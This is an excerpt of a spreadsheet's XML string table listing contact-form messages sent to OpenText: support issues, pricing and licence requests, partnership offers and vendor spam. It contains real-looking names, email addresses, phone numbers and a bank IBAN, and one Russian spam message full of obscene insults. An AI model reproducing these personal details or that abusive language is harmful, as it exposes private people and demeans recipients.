EMC Documentum Opentext._x000D_
Thanks._x000D_
Edwin</t>
  </si>
  <si>
    <t>I am the conference manager for the Digital HR &amp; Analytics forum organized by Management Events in Kuala Lumpur, Malaysia. _x000D_
I couldn't find any other source to reach so thought of emailing you here to understand if you or any of your colleague would have any interest in joining us. _x000D_
Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Mdm,_x000D_
_x000D_
Good day to you. We at WHO are currently existing customers for the OpenText MBPM product. We have been recently asked about the roadmap and support the MBPM platform by OpenText in the coming years. We have a number of applications built on this platform and there have been concerns about the lack of information regarding the supportability and future of this platform._x000D_
_x000D_
Appreciate your advice. I'd be happy to speak to a representative or account manager for WHO regarding our use of the tool._x000D_
_x000D_
Thanks_x000D_
Nicholas Gan_x000D_
 </t>
  </si>
  <si>
    <t>hi,_x000D_
I am Winne, come from ModusLink ShenZhen._x000D_
Could you help advise how to distinguish currency and put currency in field "Part. Bank Type" when ICC validation? due to there are multiple currency for single vendor in actual practice? thanks!</t>
  </si>
  <si>
    <t>Request of proposal - EIM</t>
  </si>
  <si>
    <t>Hello Team!_x000D_
My name is Denis, SysSoft company (a well-known Russian IT solutions provider and software reseller)._x000D_
One of our clients (Eurasian group. Kazakhstan) would like to purchase your software:_x000D_
ENCASE FORENSIC V8 PERPETUAL _x000D_
_x000D_
Please send a quote / calculation.</t>
  </si>
  <si>
    <t>We would like to know how to be your certified reseller in Malaysia</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Hector Nava, Chief Sales Officer with Xipe Technology. _x000D_
_x000D_
We are a mexican software development company with more than 250 programmers and 10 years of experience in offshore and nearshore programming!_x000D_
_x000D_
We can help your company grow and enhance its delivery capabilities!_x000D_
_x000D_
We have been working around the world, developing software for companies with innovative B2B business models and processes! _x000D_
_x000D_
For example, we can help you with the development of:_x000D_
_x000D_
•             Mobile Apps_x000D_
•             eCommerce Platforms Solutions_x000D_
•             Blockchain / Fintech Solutions_x000D_
•             Data Analysis and Data Visualization_x000D_
•             Whitelabel Solutions_x000D_
•             IoT &amp; Drone Solutions_x000D_
_x000D_
Technologies we are experts on…_x000D_
 _x000D_
_x000D_
Our developing process, certifications and customer´s success stories ensures the quality of our software and your satisfaction. _x000D_
_x000D_
I would like to chat with you about your business needs, our capabilities and how we can work together to fulfill your business goals._x000D_
_x000D_
Please, contact me at your earliest convenience!_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Unable to create ticket and other access issues on web site</t>
  </si>
  <si>
    <t>We are looking for information on an application called Imagenation that can open SMF type files?</t>
  </si>
  <si>
    <t>Hi there I am looking for some help as it relates to connecting HP printers to EDRMS for a client. We are wondering if our devices are compatible with your solution via connectors?</t>
  </si>
  <si>
    <t>Pricing to host AS2 communications</t>
  </si>
  <si>
    <t>I got an email for EnCase Forensic 8.08.  Email says to click on link to access My Support to download the software.  After clicking on link it says no access and that I need to do an email confirmation.  I complete the email confirmation but it still says I have no access.  How can I download EnCase? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">My account is linked to 'CSAA Insurance Exchange'  I need to get my account linked to 'AAA Northern California, Nevada, Utah'  These companies are one in the same. </t>
  </si>
  <si>
    <t>NF</t>
  </si>
  <si>
    <t>We are upgrading to Windows 10, and would like to know if there is Windows 10 version of Open Text SOCKS Client.  We are currently on Version 14.0.</t>
  </si>
  <si>
    <t>This is a test. Thank you.</t>
  </si>
  <si>
    <t>installation requirements for eDocs DM</t>
  </si>
  <si>
    <t>I've lost access to login and manage the Bayer account on OpenText Support. Please advise why this is and how to restore access._x000D_
_x000D_
Thanks,_x000D_
Steve Lizzi</t>
  </si>
  <si>
    <t>I cannot login to the support page, keep displaying "Request Confirmation Email" - Registration has been confirmed using the previously received Confirmation Email ("OpenText Connect - Account Created") Thank you.</t>
  </si>
  <si>
    <t>sms outdated on my dongle, cannot use encase 8</t>
  </si>
  <si>
    <t>Need the quotation for server lic_x000D_
_x000D_
Plz link me to the concern_x000D_
_x000D_
thanx</t>
  </si>
  <si>
    <t>Fourth and FINAL Attempt:_x000D_
_x000D_
We are interested in a potential partner/referral program - please advise if you have one....</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have previously worked with poolparty from Semantic web and I am currently evaluating alternative tools in my new company._x000D_
The basic function that I want to have is:_x000D_
-	Easy way to create individual thesaurus_x000D_
-	Easy way to link information from different thesaurus:_x000D_
o	Preferably with the ability to do drag and drop_x000D_
o	Preferably with the ability to define unique relationships between entities_x000D_
Is this something you can offer and if so, what is the cost for your platform?_x000D_
Regards,_x000D_
Mattias_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need to make sure all my office files can only be opened on company computers... and if they were opened on other computers then the file will not open (even if the thief has your software installed)._x000D_
_x000D_
Essentially I want to make sure that who ever copies the files cannot open them on unauthorized computers. To prevent theft of files. _x000D_
_x000D_
Is that possible? What is the feature called?.. do you have a video or help to show how this feature works?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Kim</t>
  </si>
  <si>
    <t>I am being charged for a service I no longer get or want. I have talked to you people to no  effect. I will now sue Open Text. One advantage of being a member of the bar</t>
  </si>
  <si>
    <t>I would want to know the latest hotfix for Media Management Connector for Content Server 16(Version 16.3) and also if there is any new release for this product</t>
  </si>
  <si>
    <t>Hi, I have few questions regarding OpenText Imaging. First I would like to know if there is a demo version available to download, so that we can test it to make sure that it work properly for what we need it for? Also can you tell me how much the licenses are for OpenText Imaging? Finally if we decide to go ahead with the purchase, how will it work? Thanks for your time!</t>
  </si>
  <si>
    <t>Need a secure centralized faxing solution that can be used across our WAN in MO.</t>
  </si>
  <si>
    <t>confirm account details in order to make a payment</t>
  </si>
  <si>
    <t xml:space="preserve">We want to purchase brava for sharepoint 2016 which should have following formats supported.  kindly share the information for brava which can be integrated with sharepoint 2016._x000D_
DWG ,Auto CAD, html, notepad,* pdf *.zip; *.jpg; *.tiff; *.bmp; *.png; *.gif; *.vob; *.mpeg; *.avi; *.wmv;; *.mp3 *.psd, *.eps; *.cdr, *.ppt8; *.msw8 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have a client who needs more information on your offering, in particular as integration partner to handle their vendor/supplier integrations.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
IntelligiChain is  a software service company specialized in the Machine Learning, Image Processing and Blockchain technologies._x000D_
_x000D_
IntelligiChain has a customer and an important and big project related to OCR technology. As part of this project, we choose the best appropriate OCR engine to satisfy our customer's needs._x000D_
_x000D_
We would like to request a demo or trial version of OpenText Capture Recognition Engine in order to test it for a limited time frame ( 4-8 weeks is optimal) _x000D_
_x000D_
Please let me know, if it is possible to obtain a OpenText library for our evaluation needs._x000D_
Please contact me by email_x000D_
_x000D_
Thanks,_x000D_
  Michael_x000D_
michael@intelligichain.com _x000D_
CEO IntelligiChain</t>
  </si>
  <si>
    <t>Greener pasture</t>
  </si>
  <si>
    <t>Need a reliable fax solution for our busy healthcare practice</t>
  </si>
  <si>
    <t xml:space="preserve">Partnerschaft / Referral agreement_x000D_
_x000D_
Guten Tag!_x000D_
Im Rahmen meiner Tätigkeit als Partnermanager in der BDO IT habe ich opentext kennengelernt. Inzwischen habe ich eine Firma gegründet, welche Spezialisten für IT-Leistungen bereitstellt, welche nach einem Softwareverkauf durch unsere Partner anfallen._x000D_
Aktuell habe ich einen opentext-Experten im Team und würde eine eine Synergie sehr begürssen!_x000D_
Gerne können wir dazu telefonieren bzw. uns in München treffen._x000D_
Herzlichen Gruss_x000D_
Roger Goetzendorff_x000D_
Geschäftsführer_x000D_
itarius UG (haftungsbeschränkt)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have some services failing to stay up and I am trying to find a solution._x000D_
The services failing are below:_x000D_
Apache Tomcat 7.0 dec_brava_x000D_
Documentum Indexagent_x000D_
Documentum xPlore CPS (CPS)_x000D_
Documentum xPlore PrimaryDsearch (Primary)_x000D_
Documentum xPlore Watchdog-E-xplore_x000D_
Documentum Content Intelligence Services_x000D_
If you could help that would be great._x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We provide cloud contact center solutions and our services are approved and backed by Etisalat. Kindly share your email id or contact on given id so that I can forward product note with tentative pricing._x000D_
_x000D_
Regards_x000D_
Neelam Naik_x000D_
Zen Interactive Technologies</t>
  </si>
  <si>
    <t>Habe keinen Zugriff auf "MySupport" obwohl ich das früher hatte._x000D_
Ein anderer Mitarbeiter (Joerg.Schilken@agfa.com) unserer Firma hat auch einen OpenText Account und kann ohne Probleme auf "My Support" zugreifen.</t>
  </si>
  <si>
    <t>Have a Content Management requirement for a PPM Opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are the biggest software resellers in Estonia and our govermental customer wants to buy one Open Text Inc GUPTA SQLBase Windows 64 Open Server 12.1 Windows 64 with maintenance and one license of upgrade:Open Text Inc GUPTA SQLBase Windows 64 Open Server 12.1 Windows 64 upgrade – 1 license Upgrade (customer: # 30015_x000D_
•	Item: 70-9465-1170_x000D_
•	Description: Upgrade to 11.7 SQLBase Open Server for Win32)_x000D_
_x000D_
Can you please send me prices for reselling. Thank You!_x000D_
</t>
  </si>
  <si>
    <t>We wanted to know the details of changes to the VIM 7.0 to VIM 7.5.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi :) _x000D_
_x000D_
My name is Melissa and I'm interested in sponsored post for software development company. Can you please tell me if you accept sponsored posts and how much will it cost?_x000D_
_x000D_
Thank you,_x000D_
Hoping for cooperation   </t>
  </si>
  <si>
    <t>Is this a scam?</t>
  </si>
  <si>
    <t>Looking for ball park costs without a demo please</t>
  </si>
  <si>
    <t xml:space="preserve">Need quotation for Encase Renewal and Tableau Hardware. The regional vendor has failed to deliver either quotation. </t>
  </si>
  <si>
    <t>Hallo,_x000D_
ich brauche eine Software um automatisiert Namen aus Dokumenten zu entfernen, bzw. name durch zufällige Namen zu ersetzen.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you offer any programming support for the public domain eclipse BIRT? </t>
  </si>
  <si>
    <t xml:space="preserve">Vi är ett svenskt IT-utvecklingsbolag med kontor i Uppsala och Colombo.  Vi har noterat att ni söker kompetenta QA resurser (ert ref nr. 21556) och vi har ett antal QA resurser tillgängliga.  Vi har ett koncept innebärande att ni kan hyra resursen först och därefter anställa personen om allt känns bra.  Konceptet är uppdelat i tre delar. Den första delen innebär att ni testar resursen i tre månader. Om ni vill behålla resursen så åker resursen hem til Sri Lanka och förbereder sin flytt. Detta kan ta en månad. Personen kan självklart fortsätta jobba under denna tid. Därefter åker resursen tillbaka till Sverige och vi skriver ett avtal med er på 6-12 månader genom vilket ni hyr resursen. Under denna period får ni en option att anställa personen direkt utan någon kostnad. Utnyttjar ni inte optionen avslutar vi uthyrningen alternativt så har ni möjlighet att fortsätta. Vi ordnar med allt det praktiska. Det som skiljer oss från andra bolag är att vi kommer från produktsidan från början och att vi skolar våra resurser att fungera i en västerländsk miljö.  Jag tar gärna att skype möte om ni är intresserade  av att höra mer. Vi har också andra resurser tillgängliga om ni har ett bredare behov. Vänligen Peter Sjögren </t>
  </si>
  <si>
    <t>I need to contact your premier partner in Dubai</t>
  </si>
  <si>
    <t>Some of our customers use RightFax. We are adding support to one of our products and need access to a RightFax server for testing. I am looking for a contact to discuss if that is possible. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm inquiring about EDI implementation and UPC Catalog to be compliant with our trade partner, Nordstrom.  </t>
  </si>
  <si>
    <t>We are unable to gain access to our GXS account. There was some turn around with employees and we are unsure what email you have on file as the contact here. Could you please let us know? We need to gain access rather quickly as our Spring line launch is fast approaching. Appreciate your help!</t>
  </si>
  <si>
    <t>Interested in moving away from our standard fax machine to a digital solution</t>
  </si>
  <si>
    <t>Licensing.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
For one of our clients in the Government Sector, we are conducting research on which software portfolios are able to fulfil our customers’ requirements and what the estimated cost of such a deployment is._x000D_
So we would be pleased to with your software suite OpenText Documentum (eForms + Workflow)_x000D_
Please provide us with your licensing model (user based, transaction based, CPU based, …) and your licensing structure. We would kindly ask you to provide a rough estimate of license cost (CAPEX) and maintenance  cost (OPEX) costs based on your list prices. Please also provide us a price list for your professional services, if they are offered by you._x000D_
We can provide you with the following assumptions regarding the user quantities (see User Type) that you can use to provide us with a comprehensive breakdown of your pricing structure._x000D_
_x000D_
Below we provide a rough estimation of the number and type of users:_x000D_
_x000D_
System Administrator : 10_x000D_
Full Access internal / Power User : 50_x000D_
Staff User / Casual User : 800_x000D_
Supervisor (Reporting) : 50_x000D_
External Power User : 1000_x000D_
External Staff User/Casual User : 10000_x000D_
_x000D_
System Administrator : System Administrators have access to all functionality within a specific location and below. _x000D_
Full Access / Power User : The Full Access User type has full access to all licensed modules, excluding the System Administration Modules._x000D_
Full Access Users can have varying abilities assigned to them by the System Administrator. _x000D_
Staff User / Casual User : Casual users of the System _x000D_
This user type applies to all staff, providing the core service to the staff._x000D_
Limited Access users are licensed concurrently, meaning multiple staff members can share a single license, but no more than one user per user license can access the system._x000D_
Supervisor (Reports) : A Supervisor Access user has all the functionality of a limited access user with the ability to visit all full access modules in a read only capacity. _x000D_
Typically, users who need the ability to </t>
  </si>
  <si>
    <t>Contract Information Required Documents as a new company Open Text / Problems with service provided_x000D_
We are trying to reach since July and haven't heard from you.  Please contact us ASAP.  _x000D_
Also, the customers has not received their confirmation by fax.  Have you performed any changes?</t>
  </si>
  <si>
    <t>as a former user of Hightail services, I learned that Hightail has been aquired by Open Text. I am having trouble setting up a Open Text account, possibly becuse my company name (Career Solutions, Inc.) is a small consultancy, not one of the names that are listed in companies with that name that showed up when I was inputting the name of my company.  What can I o to get an acount?  I ocasionall send large files (132 KB) to customer and found Hightail's service worked perfectly.</t>
  </si>
  <si>
    <t>I need to verify if OpenText Imaging Enterprise Scan 10.5 is compatible with Windows 10. -</t>
  </si>
  <si>
    <t>To discuss purchasing the annual training passport.</t>
  </si>
  <si>
    <t xml:space="preserve">We have to Communicate. </t>
  </si>
  <si>
    <t xml:space="preserve">Router lost configuration --Cisco --Rightfax broken </t>
  </si>
  <si>
    <t>I am not able to use mysupport product pages</t>
  </si>
  <si>
    <t>Hello, good afternoon. I need the License Key/Upgrade request Menu to generate .RAC files Encase. Thank you! I tried request in Support but without success.</t>
  </si>
  <si>
    <t>Becouse i see this on internet</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
_x000D_
I understand your participation at “HIMSS Global Conference &amp; Exhibition 2019” Orlando, FL._x000D_
_x000D_
Reaching you out to check if you would be interested in the newly sourced “HIMSS 2019 Attendees List Or Healthcare Information and Technology Professionals Emails List” with complete contact details for your upcoming sales, marketing and booth invitations._x000D_
_x000D_
List Fields_x000D_
Title_x000D_
First Name, Last Name_x000D_
Company Name_x000D_
Official Email Address, Web Address_x000D_
SIC Code/Industry, NAICS_x000D_
Present Address, Country, State/Province, City, Zip Code, ZIP4_x000D_
Contact Number, Fax_x000D_
Employee size, Sales, Revenue_x000D_
_x000D_
Advantages_x000D_
Higher response rates and increased conversions_x000D_
Direct contact with top managerial executives and decision makers_x000D_
Negligible email bounces due to fresh contacts_x000D_
Capability to send bulk mails (100 or 1000 in one go)_x000D_
Improved customer relationships with one-to-one interaction_x000D_
Increase ROI and revenue with multiplied sales_x000D_
_x000D_
List Best Suited For_x000D_
Direct Mailing Campaign_x000D_
Email Marketing Campaign_x000D_
Telemarketing Campaign_x000D_
_x000D_
If you are interested and your company is in need of database for campaigns and events, please let us learn we will get back to you with samples and further details for your review._x000D_
 _x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job title :_x000D_
 _x000D_
Thank you and I look forward to hearing from you._x000D_
 _x000D_
Regards,_x000D_
Karen Page| Business Development Coordinator_x000D_
_x000D_
Email List| Appending Services| Email Verification &amp; Validation| Company Profiling Services| Data Licensing Solutions| Database Management| Multichannel Prospect Lists| Social Validation| Master B2B Database Files| Hard Bounce Management| Custom Wish Lists_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">There is a Biller Account# ZX772356, billing doc# 9000823760 which we can't identify and we need your assistance where are service location addresses._x000D_
</t>
  </si>
  <si>
    <t>Following up on invoice 1812779347._x000D_
We aren't aware of who OpenText is or what company you took over._x000D_
We need some more info before we pay this invoice.</t>
  </si>
  <si>
    <t>I have received  FAX  number that goes directly to my email. However, this is a clinic and we have 3 nurses that will need access to the same fax number in order to assist our Employees. Thank you for your time</t>
  </si>
  <si>
    <t>I work hard</t>
  </si>
  <si>
    <t>Require pricing estimate for a company of 750 users. need by EOD Wednesday for OpenText EDMS</t>
  </si>
  <si>
    <t>We are working with large technology companies that use EDI (845, 810, 820).  Our cloud based system has an API that can receive JSON messaging.  I would like to speak to someone about OpenText accepting the EDI documents from our partners and converting them into JSON Messaging and forwarding to our API and vice versa; receive our API JSON response and you guys translate back into EDI and send to the partners.  Please call or email if you are able to accommodate us.  Thank you.</t>
  </si>
  <si>
    <t>Tried to pay online; got logged in, then got 'Application error' screen.</t>
  </si>
  <si>
    <t xml:space="preserve">Implementationsproblem Avaya IP Office Server Edition R10.1 (SIP pstn trunks only) - RightFax virtuell server (Brooktrout) . Är detta verifierat att det fungerar?_x000D_
Enligt Avaya Devconnect finns test med RightFax r10.6.2 with Avaya IP Office 500v2 r9.1. Det är inte jämförbart med kunden NordNet Bank AB som Server Edition R10.1 med SIP-trunkar mot line providers._x000D_
</t>
  </si>
  <si>
    <t>Where can I send my application CV?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi – We are working on implementing Office 365 for the province of PEI.  It is becoming apparent that we will need a 3rd party utility to help with records management.  Can you tell me the list price or ballpark pricing for “Documentum” so that we can estimate budgets.  When we go to purchase, we would have to go to tender for a final solution._x000D_
_x000D_
We would be implementing this over three years.  1000 users year 1, 4000 users year 2, and 5000 users year 3._x000D_
_x000D_
Thanks_x000D_
Allan_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous avons besoin en toute urgence d'un responsable commercial._x000D_
Merci.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently researching Document Management System options.  Is it possible to arrange an OpenText demo?  </t>
  </si>
  <si>
    <t xml:space="preserve">Checking information </t>
  </si>
  <si>
    <t>new employee needs to be registered for desktop fax via Fax2mail</t>
  </si>
  <si>
    <t>i would like to know how can i set up autopay on our monthly invoice. Thank you</t>
  </si>
  <si>
    <t>Would like to understand Perceptive capabilities</t>
  </si>
  <si>
    <t>Dear sir/madam,_x000D_
Open Text is a new supplier for Eurofins therefore, I would like to confirm the bank details. _x000D_
I have tried calling but after several attempts it was not possible to reach someone via telephone. _x000D_
Could you please confirm if the bank details (GB56CITI18500817763689) are correct for Open Text UK ltd._x000D_
Thank you in advance.  _x000D_
Kind regards,_x000D_
_x000D_
Chantal van Mastrigt</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! Let me introduce myself my name is Artem Meshaninov, head of licensing department of KOGORTA Company, reseller of software in Russia._x000D_
Our customer is interested in your product EMC Documenrum Information Rights Management . Tell me, please, is there an opportunity at this stage to get acquainted with the price list? What is required for this?_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity to speak at Big Data &amp; Data Science 2019_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We want to buy brava for sharepoint 2016 on-premises._x000D_
Firstly please confirm, that IXL sku version can be intregrated to sharepoint 2016 on-premises? if yes, please share some detail how it would be integrated/_x000D_
_x000D_
Also we have not found below formats in IXL sku, please confirm, it can be available in IXL sku. _x000D_
txt_x000D_
dv_x000D_
xml_x000D_
xsl_x000D_
vst_x000D_
WSDL_x000D_
write now_x000D_
word star_x000D_
msg_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a 15-20 employee law firm based in Moscow, Russia. Could you please provide us the cost breakdown for installing OpenText for our company? We are also interested, if the documents can be formatted together by several people. Any details such as technical support are welcome. Thank you. Best, Ksenia. </t>
  </si>
  <si>
    <t>Hello, _x000D_
We are a weddings and events planner and we are searching for a program to centralize all the work. to have all pictures, design, suppliers, conversation with the clients during the events in one app or program. Do you have any solution for this kind of company? if yes can we have a presentation to check it. _x000D_
Waiting for your reply.  _x000D_
Best regards,_x000D_
Zeina</t>
  </si>
  <si>
    <t>Inquiry on cost of implementing open text edoc as a document management system for an organisation.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I am interested in some more information for your Secure Mail and Secure File Transfer suites please?_x000D_
_x000D_
We use office 365 and would want to integrate it with Outlook (currently 2010 but upgrading to 365)_x000D_
_x000D_
We have around 120 users?_x000D_
_x000D_
We are based in England and would like some ballpoint costs please?_x000D_
_x000D_
Also, can i please check where the data is held? If offsite is this in Europe? Obviously thinking GDPR._x000D_
_x000D_
Thanks_x000D_
_x000D_
Andy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to request an access to the following documents: _x000D_
- Opentext Business Center Solution Accelerators Configuration _x000D_
- Opentext Business Center for SAP solutions - Configuration guide BOCP-CGD_x000D_
- Opentext Business Center for SAP solutions - User guide BOCP-UGD. _x000D_
I tried to search for them in Support =&gt; Knowledge Base but I don't have access to this website. _x000D_
After selecting "Request confirmation email" and logging again to my account, I chose once again Support =&gt; Knowledge Base and again received an information "No access". _x000D_
Could you please help with getting an access here? Moreover, I am not sure if my company has a customer support contract, so I would be grateful if you could check it. _x000D_
Thanks in advance! _x000D_
_x000D_
Kind regards, _x000D_
Justyna Kaczor</t>
  </si>
  <si>
    <t>Dear Marketing In-Charge,_x000D_
 _x000D_
Hope you're doing well!_x000D_
 _x000D_
I had a quick glimpse of your company profile, I would like to discuss if you would be interested in acquiring Industry Professionals Contacts to accelerate your sales/marketing activities or engage with our telemarketing support service ( with your own client database or tap on our professional contact list ) to do a brand awareness for your company services and help to build your customer base in Asia._x000D_
 _x000D_
For our B2B database, we do provide different fields including Contact Name, Company Name, Physical Address, Phone Number, Email Address, SIC Code, Industry Type, Revenue size, Employee Size etc. which helps you to meet thousands of new prospects to enhance your business and to expand your customer base._x000D_
_x000D_
If it sounds of value, please contact me at michelle.koo@dnb.com.sg or call me at 8363 6683, I would love to meet up with you or have a short informal chat over the phone to share with you the basic information on how we can help boost your activities with our services in your company._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
Michelle Koo_x000D_
Business Development Manager_x000D_
Dun and Bradstreet Singapore</t>
  </si>
  <si>
    <t>I am a BS-IT student from De La Salle University Manila and would like to apply for internship at OpentText(Philippines) based at Makati.</t>
  </si>
  <si>
    <t>I need to download SQLBase 11.5 sp1 or sp2 where can I find it?</t>
  </si>
  <si>
    <t>We are looking for solution which can help us process scanned documents.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We currently outsource the management of our IP, but are currently reviewing our IP strategy and would like to take more control of our IP and get more value from it.  In this scope we are reviewing the management of patents, trademarks, trade secrets, domains and know-how.   We currently have no single IP management solution, using instead various databases, directory’s and document management solutions.  One of which is Open Text.  We would like to understand more about how your product might meet our expanded requirements and/or how it would integrate with an IP management solution._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Thanks_x000D_
Kim _x000D_
</t>
  </si>
  <si>
    <t>To know about your Product</t>
  </si>
  <si>
    <t>Hello. My company bought your software last year. Unfortunately I cannot trace the license for the product. All I have is the installation on one of our servers. Now, we have to decommission the server. _x000D_
Can you send me link to download the software and can you tell me if key bellow are enough to activate software on another server? _x000D_
Thanks._x000D_
I also sent yesterday a mail to 'publicrelations@opentext.com' from florin.iordache@tiriacauto.ro with a picture from "About" tab where is license presented but i have no answer yet.</t>
  </si>
  <si>
    <t>We are looking for sharepoint and OpenText integration.</t>
  </si>
  <si>
    <t>zzzzzz內容zzzzzzz</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i want to implement Extream our company. I need information about cost </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We’re IT leads provider from Noida, India. If you are looking for Web Design, Development or SEO leads kindly get back to us and we will charge as mentioned below. _x000D_
_x000D_
Web Development $10 Per Lead_x000D_
Web Designing $10 Per Lead_x000D_
SEO $8 Per Lead_x000D_
_x000D_
Regards_x000D_
Akansha_x000D_
Email: info@eacpl.net_x000D_
WhatsAPP: +91 8130017380  </t>
  </si>
  <si>
    <t>Ваш сайт это убогое говно, вы его сами делали или заплатили криворукому студенту? _x000D_
Я делаю крутые сайты профессионально и дешево!!! Телефон +79169295582 или 89169295582 по россии. Звоните! Скидка только сейчас! _x000D_
Слыш, мудак, сайт закажи или зассал терпила? Маму твою ебал. _x000D_
Скидка только сейчас, консультация бесплатно. Примеры работ по запросу. _x000D_
Александр</t>
  </si>
  <si>
    <t>Urgent. Please contact me, it's with regards to an existing customer Tyco Fire &amp; Security_x000D_
Thanks</t>
  </si>
  <si>
    <t>Inquiry. I am trying to find the EnCase certification testing organization to take the Certified Computer Forensic Exam. Does this company have any affiliatioin with EnCase?</t>
  </si>
  <si>
    <t>Job application</t>
  </si>
  <si>
    <t>Requesting a demo for BizManager, EDI translation software.</t>
  </si>
  <si>
    <t>Hello, I would like to be contacted by a sales person to buy licences and understand cloud offering._x000D_
Thank you very much_x000D_
_x000D_
Regards,_x000D_
Tamara</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to register my Encase forensic dongle with my .gov email address but do not see any option on the Opentext website to facilitate doing so. Any guidance via email would be appreciated. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello - _x000D_
My company received a purchase order from Comcast that it says we need GXS to view. When I go there to sign up for an acct it says I need an invite code. Can I get an invite code to complete this? Thanks! </t>
  </si>
  <si>
    <t>After installing Teleform Workstation (client), every application generates an "Invalid directory:  Dictionary Directory (V16.3.75)" error.  No information regarding error found in documentation or searches.  Also, still unable to use MySupport due to confirmed email issue.</t>
  </si>
  <si>
    <t xml:space="preserve">Sales Inquiry/Discovery Call </t>
  </si>
  <si>
    <t>Hi, I'm looking to set up a demo for our team to look at the ProVision software, we are looking into similar tools and would love to see more.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are currently running Alchemy Release 9.0 (Build 300.130).  This version is quite old and needs to be upgraded or replaced.  We would like to know what Open Text currently has available as an upgrade/replacement option .  Please email me or call so we can gather more information regarding your currently available solutions._x000D_
_x000D_
Thank you,_x000D_
Geoff Foxcroft</t>
  </si>
  <si>
    <t xml:space="preserve">There seems to be a problem with the incoming faxes. Customers are faxing over documents and receiving confirmations for them; however, I am not receiving the faxes. </t>
  </si>
  <si>
    <t>Unable to access My Support. I've received the registration confirmation and have select the confirmation link. However, I'm still unable to access the support site. I am working on setup of xPlore 1.5 (SSL) for AppXtender 8.1.</t>
  </si>
  <si>
    <t>Приветствую Вас, меня зовут Андрей и я являюсь сертифицированным - Золотым партнером по CMS Bitrix и CRM Bitrix24. _x000D_
 _x000D_
Я и моя небольшая команда профессионалов осуществляет техническую поддержку, модернизацию и обслуживание сайтов на Битриксе. Мы работаем над тем, чтобы ваш проект полностью отвечал поставленным целям и задачам с учетом особенностей вашего бизнеса. _x000D_
 _x000D_
ВАЖНО! На все, что мы делаем распространяется гарантия 12 месяцев. _x000D_
 _x000D_
МАКСИМАЛЬНАЯ ИНТЕГРАЦИЯ _x000D_
Настроим обмен сайта с 1С даже если нет официального модуля. Разработаем механизмы интеграции с CRM системами, товарными агрегаторами, службами доставки и службами оплаты _x000D_
 _x000D_
РАБОТА С КОНТЕНТОМ _x000D_
Обновление и размещение на сайте нового контента больше не будет проблемой. Такие операции как: публикация новостей, размещение статей, обновление каталога товаров и прайс-листов, размещение акций и спецпредложений мы берем на себя. _x000D_
 _x000D_
ПРОГРАММИРОВАНИЕ И ДОРАБОТКА САЙТА _x000D_
Поможем с доработкой текущего кода и написанием нового. Установим и внедрим модули с Marketplace или напишем собственные под ваши задачи. Проведем аудит кода и устраним все уязвимости, а также проведем автоматизацию ваших бизнес процессов _x000D_
 _x000D_
Реализовано более 150 сложных проектов. _x000D_
Доработок выполнено - на более 11 000 часов. _x000D_
Готов по запросу прислать портфолио работ и сертификаты. _x000D_
Мы в ТОП50 рейтинге по Москве - по созданию и поддержке интернет-магазинов. _x000D_
 _x000D_
Мы знаем, что битрикс дорогая система для обслуживания. _x000D_
У нас не Московские цены, а цены г. Ульяновска - Убедитесь сами. _x000D_
 _x000D_
Если у вас имеются вопросы, смело пишите на почту: andrey.1cbitrix@gmail.com _x000D_
или звоните по номеру: +7 (495) 118-43-49 _x000D_
Или по Skype: voiimond _x000D_
 _x000D_
Спасибо за прочтение.</t>
  </si>
  <si>
    <t>In 2014 and 2015 I taught EnCase v.7 Introduction to Computer Forensics in a lab with Encase v.7 installed and had Peterson's HDD as a sample file, along with all the documentation and other materials. I'm now interested in trying to complete my own EnCE credential, but I no longer have access to the equipment or files._x000D_
_x000D_
Is there any chance I could replace the needed materials and complete that credential? If not, what forensic credential could I complete now that I don't have the same lab software and hardware available?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>want to communicat with here</t>
  </si>
  <si>
    <t>Interested in documentum for life sciences. We used to sell pharmaready to life science companies for ectd submissions. We r looking for a change. How can we sign up as a partner with opentext. Thanks</t>
  </si>
  <si>
    <t>Hi, I am Hybris Technical Consultant , I am looking for hybris integration software download pack for OpenText DAM solution. Please provide me the link to download the package. I am looking for hybris version 1808.</t>
  </si>
  <si>
    <t>Need support for encase 8.08 cert</t>
  </si>
  <si>
    <t>We are interested in using your system for our EDI needs.  Thank you.</t>
  </si>
  <si>
